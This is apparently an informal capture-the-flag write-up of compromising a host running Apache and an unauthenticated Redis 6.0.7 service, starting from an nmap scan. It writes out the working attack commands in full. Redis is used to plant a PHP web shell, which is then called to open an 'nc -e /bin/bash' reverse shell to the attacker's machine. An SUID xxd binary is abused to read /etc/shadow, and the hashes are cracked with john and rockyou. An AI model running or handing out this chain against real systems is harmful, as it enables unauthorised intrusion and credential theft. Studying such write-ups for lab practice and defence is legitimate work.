Nmap Results :

Nmap scan report for
Host is up (0.053s latency).

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   Redis key-value store 6.0.7

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sat Oct  3 08:38:25 2020 -- 1 IP address (1 host up) scanned in 8.74 seconds

So here we can see 2 ports open 80 which is a default Apache Page and 6379 which seems to be reddis and it took me a while to figure it out for some reason but it was Reddis CLI so we can look up some ways to hijack this or utilize this Reddis CLI to exploit and maybe get us a Reverse shell back or use this for further ennumeration.

An article we can use for this is : https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#basic-information

To exploit this Redis CLI to get a reverse shell back :

nc <IP OF TARGET> 6379
config set dbfilename cmdshell.php

set test "<?php system($_GET['c']); ?>"


Then we will have RCE and we can go to the page we just made and use that to get a reverse shell back to us like this :

http://<IP>/cmdshell.php?c=nc -e /bin/bash <Your IP> <Your Port>
rlwrap nc -nvlp <Yout Port> # On your local machine

and then after we get our shell back lets ennumerate further to get root privelleges and stuff. So for this we will look at the SUIDs and sudo -l permissions and after looking at this we see a itnresting suid bit called xxd which allows us to read files as root so in this case the best idea for us would be to read /etc/shadow so lets do that.

/usr/bin/xxd /etc/shadow | /usr/bin/xxd -r 

and then lets put the last hash into john and crack it and then when we use this password to switch user and sudo -l we can see we can run all the commands as root soo by doing a simple sudo su we will be root and gg Command for John :

john hash -w=/usr/share/wordlists/rockyou.txt

Some Common hash cracking formats :

To crack shadow files :

In this case we can also use a johntheripper utility script called unshadow like this :

unshadow [path to passwd] [path to shadow] > shadowfile 

and then we can use this shadowfile outputted from the unshadow :

john shadowfile --format=sha512crypt -w=/usr/share/wordlists/rockyou.txt